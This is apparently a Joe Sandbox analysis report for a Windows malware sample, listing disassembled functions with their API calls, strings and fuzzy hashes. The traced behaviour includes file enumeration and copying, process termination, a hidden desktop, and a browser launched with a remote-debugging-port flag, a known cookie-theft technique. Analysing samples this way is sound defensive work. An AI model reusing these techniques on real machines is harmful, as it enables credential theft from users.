                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                                • String ID:
                                • API String ID: 1346933759-0
                                • Opcode ID: ac5e0573f032610b325092ac884bb234f726ca614dcc2591f1c09ce3f396bb62
                                • Instruction ID: 251854fb810a23b1faf6188276ca2a1b5de144d2c29b802d39a3a34c27dfe7e6
                                • Opcode Fuzzy Hash: ac5e0573f032610b325092ac884bb234f726ca614dcc2591f1c09ce3f396bb62
                                • Instruction Fuzzy Hash: 0C124771A11A069FCF26EF79D889AAF77B8EF55300F054528F846EB250DB34DC458B90
                                Function 003ACBE0 Relevance: 54.6, APIs: 27, Strings: 4, Instructions: 310filestringCOMMON
                                Download Yara Rule
                                APIs
                                • wsprintfA.USER32 ref: 003ACBFC
                                • FindFirstFileA.KERNEL32(?,?), ref: 003ACC13
                                • lstrcat.KERNEL32(?,?), ref: 003ACC5F
                                • StrCmpCA.SHLWAPI(?,003C17A0), ref: 003ACC71
                                • StrCmpCA.SHLWAPI(?,003C17A4), ref: 003ACC8B
                                • wsprintfA.USER32 ref: 003ACCB0
                                • PathMatchSpecA.SHLWAPI(?,00F78AD8), ref: 003ACCE2
                                • CoInitialize.OLE32(00000000), ref: 003ACCEE
                                  • Part of subcall function 003ACAE0: CoCreateInstance.COMBASE(003BB110,00000000,00000001,003BB100,?), ref: 003ACB06
                                  • Part of subcall function 003ACAE0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 003ACB46
                                  • Part of subcall function 003ACAE0: lstrcpyn.KERNEL32(?,?,00000104), ref: 003ACBC9
                                • CoUninitialize.COMBASE ref: 003ACD09
                                • lstrcat.KERNEL32(?,?), ref: 003ACD2E
                                • lstrlen.KERNEL32(?), ref: 003ACD3B
                                • StrCmpCA.SHLWAPI(?,003BCFEC), ref: 003ACD55
                                • wsprintfA.USER32 ref: 003ACD7D
                                • wsprintfA.USER32 ref: 003ACD9C
                                • PathMatchSpecA.SHLWAPI(?,?), ref: 003ACDB0
                                • wsprintfA.USER32 ref: 003ACDD8
                                • CopyFileA.KERNEL32(?,?,00000001), ref: 003ACDF1
                                • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 003ACE10
                                • GetFileSizeEx.KERNEL32(00000000,?), ref: 003ACE28
                                • CloseHandle.KERNEL32(00000000), ref: 003ACE33
                                • CloseHandle.KERNEL32(00000000), ref: 003ACE3F
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003ACE54
                                • lstrcpy.KERNEL32(00000000,?), ref: 003ACE94
                                • FindNextFileA.KERNEL32(?,?), ref: 003ACF8D
                                • FindClose.KERNEL32(?), ref: 003ACF9F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Filewsprintf$CloseFind$CreateHandleMatchPathSpeclstrcat$ByteCharCopyFirstInitializeInstanceMultiNextSizeUninitializeUnothrow_t@std@@@Wide__ehfuncinfo$??2@lstrcpylstrcpynlstrlen
                                • String ID: %s%s$%s\%s$%s\%s\%s$%s\*
                                • API String ID: 3860919712-2388001722
                                • Opcode ID: 4bb1ac1bf1a0a2275938d9814c1be12c296e7d629129b926851359d571956408
                                • Instruction ID: ef0cdadc3884e351876b06072639889d566110da531f0ad747449bbdd6c5bc5f
                                • Opcode Fuzzy Hash: 4bb1ac1bf1a0a2275938d9814c1be12c296e7d629129b926851359d571956408
                                • Instruction Fuzzy Hash: E9C14F72910619AFDB21DF64DC49EEE77B9EF55300F044598F50AA7280EE30AE58CF90
                                Function 003A1269 Relevance: 43.8, APIs: 29, Instructions: 336stringfileCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A1291
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A12B4
                                • lstrcat.KERNEL32(00000000,00000000), ref: 003A12BF
                                • lstrlen.KERNEL32(003C4CA8), ref: 003A12CA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A12E7
                                • lstrcat.KERNEL32(00000000,003C4CA8), ref: 003A12F3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A131E
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 003A133A
                                • StrCmpCA.SHLWAPI(?,003C17A0), ref: 003A135C
                                • StrCmpCA.SHLWAPI(?,003C17A4), ref: 003A1376
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A13AF
                                • lstrcpy.KERNEL32(00000000,?), ref: 003A13D7
                                • lstrcat.KERNEL32(00000000,00000000), ref: 003A13E2
                                • lstrlen.KERNEL32(003C1794), ref: 003A13ED
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A140A
                                • lstrcat.KERNEL32(00000000,003C1794), ref: 003A1416
                                • lstrlen.KERNEL32(?), ref: 003A1423
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1443
                                • lstrcat.KERNEL32(00000000,?), ref: 003A1451
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A147A
                                • StrCmpCA.SHLWAPI(?,00F7DE28), ref: 003A14A3
                                • lstrcpy.KERNEL32(00000000,?), ref: 003A14E4
                                • lstrcpy.KERNEL32(00000000,?), ref: 003A150D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1535
                                • StrCmpCA.SHLWAPI(?,00F7E538), ref: 003A1552
                                • lstrcpy.KERNEL32(00000000,?), ref: 003A1593
                                • lstrcpy.KERNEL32(00000000,?), ref: 003A15BC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A15E4
                                • lstrcpy.KERNEL32(00000000,?), ref: 003A1796
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A17BE
                                • lstrcpy.KERNEL32(00000000,?), ref: 003A17F5
                                • FindNextFileA.KERNEL32(00000000,?), ref: 003A181C
                                • FindClose.KERNEL32(00000000), ref: 003A182B
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                                • String ID:
                                • API String ID: 1346933759-0
                                • Opcode ID: 339e4c0627378969132cc0eaddb4b910b70dc56a537cb27cc3bfa0b95799b2ec
                                • Instruction ID: 84a39a0fa13f5742a7b0d6bb731a93324820ae15bc7fa15749d24c09283f7299
                                • Opcode Fuzzy Hash: 339e4c0627378969132cc0eaddb4b910b70dc56a537cb27cc3bfa0b95799b2ec
                                • Instruction Fuzzy Hash: B4C15831A11A06AFCF22EF69DC89AAF77B8EF55300F054528F846AB251DB34DC55CB90
                                Function 00399770 Relevance: 42.2, APIs: 21, Strings: 3, Instructions: 234stringsleepCOMMON
                                Download Yara Rule
                                APIs
                                • memset.MSVCRT ref: 00399790
                                • lstrcat.KERNEL32(?,?), ref: 003997A0
                                • lstrcat.KERNEL32(?,?), ref: 003997B1
                                • lstrcat.KERNEL32(?, --remote-debugging-port=9229 --profile-directory="), ref: 003997C3
                                • memset.MSVCRT ref: 003997D7
                                  • Part of subcall function 003B3E70: lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003B3EA5
                                  • Part of subcall function 003B3E70: lstrcpy.KERNEL32(00000000,00F7EEB0), ref: 003B3ECF
                                  • Part of subcall function 003B3E70: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,0039134E,?,0000001A), ref: 003B3ED9
                                • wsprintfA.USER32 ref: 00399806
                                • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 00399827
                                • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 00399844
                                  • Part of subcall function 003B46A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 003B46B9
                                  • Part of subcall function 003B46A0: Process32First.KERNEL32(00000000,00000128), ref: 003B46C9
                                  • Part of subcall function 003B46A0: Process32Next.KERNEL32(00000000,00000128), ref: 003B46DB
                                  • Part of subcall function 003B46A0: StrCmpCA.SHLWAPI(?,?), ref: 003B46ED
                                  • Part of subcall function 003B46A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 003B4702
                                  • Part of subcall function 003B46A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 003B4711
                                  • Part of subcall function 003B46A0: CloseHandle.KERNEL32(00000000), ref: 003B4718
                                  • Part of subcall function 003B46A0: Process32Next.KERNEL32(00000000,00000128), ref: 003B4726
                                  • Part of subcall function 003B46A0: CloseHandle.KERNEL32(00000000), ref: 003B4731
                                • lstrcat.KERNEL32(00000000,?), ref: 00399878
                                • lstrcat.KERNEL32(00000000,?), ref: 00399889
                                • lstrcat.KERNEL32(00000000,003C4B60), ref: 0039989B
                                • memset.MSVCRT ref: 003998AF
                                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 003998D4
                                • lstrcpy.KERNEL32(00000000,?), ref: 00399903
                                • StrStrA.SHLWAPI(00000000,00F7F580), ref: 00399919
                                • lstrcpyn.KERNEL32(005C93D0,00000000,00000000), ref: 00399938
                                • lstrlen.KERNEL32(?), ref: 0039994B
                                • wsprintfA.USER32 ref: 0039995B
                                • lstrcpy.KERNEL32(?,00000000), ref: 00399971
                                • Sleep.KERNEL32(00001388), ref: 003999E7
                                  • Part of subcall function 00391530: lstrcpy.KERNEL32(00000000,?), ref: 00391557
                                  • Part of subcall function 00391530: lstrcpy.KERNEL32(00000000,?), ref: 00391579
                                  • Part of subcall function 00391530: lstrcpy.KERNEL32(00000000,?), ref: 0039159B
                                  • Part of subcall function 00391530: lstrcpy.KERNEL32(00000000,?), ref: 003915FF
                                  • Part of subcall function 003992B0: strlen.MSVCRT ref: 003992E1
                                  • Part of subcall function 003992B0: strlen.MSVCRT ref: 003992FA
                                  • Part of subcall function 003992B0: strlen.MSVCRT ref: 00399399
                                  • Part of subcall function 003992B0: strlen.MSVCRT ref: 003993E6
                                  • Part of subcall function 003B4740: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 003B4759
                                  • Part of subcall function 003B4740: Process32First.KERNEL32(00000000,00000128), ref: 003B4769
                                  • Part of subcall function 003B4740: Process32Next.KERNEL32(00000000,00000128), ref: 003B477B
                                  • Part of subcall function 003B4740: OpenProcess.KERNEL32(00000001,00000000,?), ref: 003B479C
                                  • Part of subcall function 003B4740: TerminateProcess.KERNEL32(00000000,00000000), ref: 003B47AB
                                  • Part of subcall function 003B4740: CloseHandle.KERNEL32(00000000), ref: 003B47B2
                                  • Part of subcall function 003B4740: Process32Next.KERNEL32(00000000,00000128), ref: 003B47C0
                                  • Part of subcall function 003B4740: CloseHandle.KERNEL32(00000000), ref: 003B47CB
                                • CloseDesktop.USER32(?), ref: 00399A1C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Process32lstrcat$Close$HandleNextProcessstrlen$CreateDesktopOpenmemset$FirstSnapshotTerminateToolhelp32wsprintf$FolderPathSleepSystemTimelstrcpynlstrlen
                                • String ID: --remote-debugging-port=9229 --profile-directory="$%s%s$D
                                • API String ID: 958055206-1862457068
                                • Opcode ID: 52c03c98c1dc8b1519f34dbe0304857cc5d63d5dcdeecc98a22164911b7674b1
                                • Instruction ID: fa322ac088527f109953041e436325e6ed04337dc7c24d974fabab924dd57d64
                                • Opcode Fuzzy Hash: 52c03c98c1dc8b1519f34dbe0304857cc5d63d5dcdeecc98a22164911b7674b1
                                • Instruction Fuzzy Hash: 48917371A10608AFDB11DFA4DC89FEE77B8AF58700F104599F609AB191DF70AE44CBA4
                                Function 003AE210 Relevance: 38.7, APIs: 20, Strings: 2, Instructions: 212stringfileCOMMON
                                Download Yara Rule
                                APIs
                                • wsprintfA.USER32 ref: 003AE22C
                                • FindFirstFileA.KERNEL32(?,?), ref: 003AE243
                                • StrCmpCA.SHLWAPI(?,003C17A0), ref: 003AE263
                                • StrCmpCA.SHLWAPI(?,003C17A4), ref: 003AE27D
                                • wsprintfA.USER32 ref: 003AE2A2
                                • StrCmpCA.SHLWAPI(?,003BCFEC), ref: 003AE2B4
                                • wsprintfA.USER32 ref: 003AE2D1
                                  • Part of subcall function 003AEDE0: lstrcpy.KERNEL32(00000000,?), ref: 003AEE12
                                • wsprintfA.USER32 ref: 003AE2F0
                                • PathMatchSpecA.SHLWAPI(?,?), ref: 003AE304
                                • lstrcat.KERNEL32(?,00F7FBD0), ref: 003AE335
                                • lstrcat.KERNEL32(?,003C1794), ref: 003AE347
                                • lstrcat.KERNEL32(?,?), ref: 003AE358
                                • lstrcat.KERNEL32(?,003C1794), ref: 003AE36A
                                • lstrcat.KERNEL32(?,?), ref: 003AE37E
                                • CopyFileA.KERNEL32(?,?,00000001), ref: 003AE394
                                • lstrcpy.KERNEL32(00000000,?), ref: 003AE3D2
                                • lstrcpy.KERNEL32(00000000,?), ref: 003AE422
                                • DeleteFileA.KERNEL32(?), ref: 003AE45C
                                  • Part of subcall function 00391530: lstrcpy.KERNEL32(00000000,?), ref: 00391557
                                  • Part of subcall function 00391530: lstrcpy.KERNEL32(00000000,?), ref: 00391579
                                  • Part of subcall function 00391530: lstrcpy.KERNEL32(00000000,?), ref: 0039159B
                                  • Part of subcall function 00391530: lstrcpy.KERNEL32(00000000,?), ref: 003915FF
                                • FindNextFileA.KERNEL32(00000000,?), ref: 003AE49B
                                • FindClose.KERNEL32(00000000), ref: 003AE4AA
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
                                • String ID: %s\%s$%s\*
                                • API String ID: 1375681507-2848263008
                                • Opcode ID: b477eb4d27df300f30e8c963d56d5efd43f7d64a51edae028d3cae45ae68823d
                                • Instruction ID: d47c02043ee684123685ab22e3888cda0dfc47bcfebf2183f84dfea96460d211
                                • Opcode Fuzzy Hash: b477eb4d27df300f30e8c963d56d5efd43f7d64a51edae028d3cae45ae68823d
                                • Instruction Fuzzy Hash: C4814D72900619AFCB21EF64DC49EEF77B9FF58300F044998B51A97141DA35AA58CFA0
                                Function 003916B9 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 219stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003916E2
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 00391719
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039176C
                                • lstrcat.KERNEL32(00000000), ref: 00391776
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003917A2
                                • lstrcpy.KERNEL32(00000000,?), ref: 003918F3
                                • lstrcat.KERNEL32(00000000,00000000), ref: 003918FE
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat
                                • String ID: \*.*
                                • API String ID: 2276651480-1173974218
                                • Opcode ID: c2650e485b5b0ae2d0a8356b58981ed0967ba615950bb3461d7e51c2fb748e1a
                                • Instruction ID: fa2c8c824928fd11d8788ef7c8f98f287e5ffb408b30e3c4b05aea1b7811302e
                                • Opcode Fuzzy Hash: c2650e485b5b0ae2d0a8356b58981ed0967ba615950bb3461d7e51c2fb748e1a
                                • Instruction Fuzzy Hash: 5B813031912A1BAFCF23EFA8D989EAF77B9AF14700F051124F805AB251DB309D15CB91
                                Function 003ADD30 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 171stringfilememoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 003ADD45
                                • RtlAllocateHeap.NTDLL(00000000), ref: 003ADD4C
                                • wsprintfA.USER32 ref: 003ADD62
                                • FindFirstFileA.KERNEL32(?,?), ref: 003ADD79
                                • StrCmpCA.SHLWAPI(?,003C17A0), ref: 003ADD9C
                                • StrCmpCA.SHLWAPI(?,003C17A4), ref: 003ADDB6
                                • wsprintfA.USER32 ref: 003ADDD4
                                • DeleteFileA.KERNEL32(?), ref: 003ADE20
                                • CopyFileA.KERNEL32(?,?,00000001), ref: 003ADDED
                                  • Part of subcall function 00391530: lstrcpy.KERNEL32(00000000,?), ref: 00391557
                                  • Part of subcall function 00391530: lstrcpy.KERNEL32(00000000,?), ref: 00391579
                                  • Part of subcall function 00391530: lstrcpy.KERNEL32(00000000,?), ref: 0039159B
                                  • Part of subcall function 00391530: lstrcpy.KERNEL32(00000000,?), ref: 003915FF
                                  • Part of subcall function 003AD980: memset.MSVCRT ref: 003AD9A1
                                  • Part of subcall function 003AD980: memset.MSVCRT ref: 003AD9B3
                                  • Part of subcall function 003AD980: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 003AD9DB
                                  • Part of subcall function 003AD980: lstrcpy.KERNEL32(00000000,?), ref: 003ADA0E
                                  • Part of subcall function 003AD980: lstrcat.KERNEL32(?,00000000), ref: 003ADA1C
                                  • Part of subcall function 003AD980: lstrcat.KERNEL32(?,00F7F3E8), ref: 003ADA36
                                  • Part of subcall function 003AD980: lstrcat.KERNEL32(?,?), ref: 003ADA4A
                                  • Part of subcall function 003AD980: lstrcat.KERNEL32(?,00F7DDB0), ref: 003ADA5E
                                  • Part of subcall function 003AD980: lstrcpy.KERNEL32(00000000,?), ref: 003ADA8E
                                  • Part of subcall function 003AD980: GetFileAttributesA.KERNEL32(00000000), ref: 003ADA95
                                • FindNextFileA.KERNEL32(00000000,?), ref: 003ADE2E
                                • FindClose.KERNEL32(00000000), ref: 003ADE3D
                                • lstrcat.KERNEL32(?,00F7FBD0), ref: 003ADE66
                                • lstrcat.KERNEL32(?,00F7E638), ref: 003ADE7A
                                • lstrlen.KERNEL32(?), ref: 003ADE84
                                • lstrlen.KERNEL32(?), ref: 003ADE92
                                • lstrcpy.KERNEL32(00000000,?), ref: 003ADED2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
